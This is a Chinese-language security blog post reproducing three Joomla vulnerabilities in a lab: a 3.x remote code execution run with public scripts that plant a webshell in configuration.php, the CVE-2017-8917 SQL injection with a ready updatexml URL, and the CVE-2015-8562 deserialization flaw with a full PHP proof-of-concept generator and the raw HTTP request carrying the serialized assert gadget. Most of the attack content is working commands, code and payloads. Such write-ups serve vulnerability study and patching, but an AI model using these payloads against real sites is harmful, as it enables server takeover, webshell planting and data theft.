Joomla漏洞总结

以下文章来源于黑白天 ,作者kevin
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

漏洞描述

Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。
漏洞影响版本
Joomla 3.0.0-3.4.6

漏洞复现

搭建完成如下图
07337-0vekh5tdj7v.png

运行脚本检验是否存在漏洞

python3 Joomla-3.4.6-RCE.py -t http://10.12.1.25/Joomla_3.4.6-Stable-Full_Package/
41203-4gvfz3wugg5.png

漏洞利用

python3 joomla3.4.6_rce.py -t http://10.12.1.25/Joomla_3.4.6-Stable-Full_Package/ --exploit -l 10.12.1.25 -p 6666

96108-vba54nlq5cg.png

成功在configuration.php目录下写入一句话木马(linux的话可以弹shell)
密码为bqgpjdouovnjsuveyjirilxiqzbemyjsnhooizjwscgjinjjwm

18051-sj20lqbx59.png

78929-kjf12rxi9n.png

成功连接

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞

安装完成后,访问

http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
22075-70jormnkt4f.png
即可看到报错信息

Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)

本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。
通过Joomla中的Gadget,可造成任意代码执行的结果。

影响版本

Joomla 1.5.x, 2.x, and 3.x before 3.4.6
PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45

漏洞复现

我们不带User-Agent头,先访问一次目标主页,记下服务端返回的Cookie:

84612-nzn7uy3sy.png

再用如下脚本生成POC:

<?php
class JSimplepieFactory {
}
class JDatabaseDriverMysql {

}
class SimplePie {
    var $sanitize;
    var $cache;
    var $cache_name_function;
    var $javascript;
    var $feed_url;
    function __construct()
    {
        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
        $this->javascript = 9999;
        $this->cache_name_function = "assert";
        $this->sanitize = new JDatabaseDriverMysql();
        $this->cache = true;
    }
}

class JDatabaseDriverMysqli {
    protected $a;
    protected $disconnectHandlers;
    protected $connection;
    function __construct()
    {
        $this->a = new JSimplepieFactory();
        $x = new SimplePie();
        $this->connection = 1;
        $this->disconnectHandlers = [
            [$x, "init"],
        ];
    }
}

$a = new JDatabaseDriverMysqli();
$poc = serialize($a);

$poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);

echo "123}__test|{$poc}\xF0\x9D\x8C\x86";

19397-1oxa7iwwsdm.png
将生成好的POC作为User-Agent,带上第一步获取的Cookie发包,这一次发包,脏数据进入Mysql数据库。然后同样的包再发一次,我们的代码被执行:

GET / HTTP/1.1
Host: host:8080
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Connection: close
Cookie: b75d0a0a102c83a58752ca23c294bdfb=01ebc701d30c6a74457056da2ffeb2e7;
User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}4
Content-Length: 2

68354-zk4g1kgq39.png

本文经授权后发布,本文观点不代表立场,转载请联系原作者。
赌一赌,摩托变路虎?玩一玩,走上不归路!
« 上一篇 09-23
「翻译」 如何Bypass rbash
下一篇 » 10-12

相关推荐

红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...

渗透某勒索服务器

这是 酒仙桥六号部队 的第 74 篇文章。全文共计1300个字,预计阅读时长5分钟。文章来源:六号刃部 - 酒仙桥六号部队 事情经过和我一起合租的室友喜欢...

Android渗透工具集合

Android安全测试更多地被安全行业用来测试Android应用程序中的漏洞。下面将列举全面的Android渗透测试工具和资源列表,其涵盖了在Andro...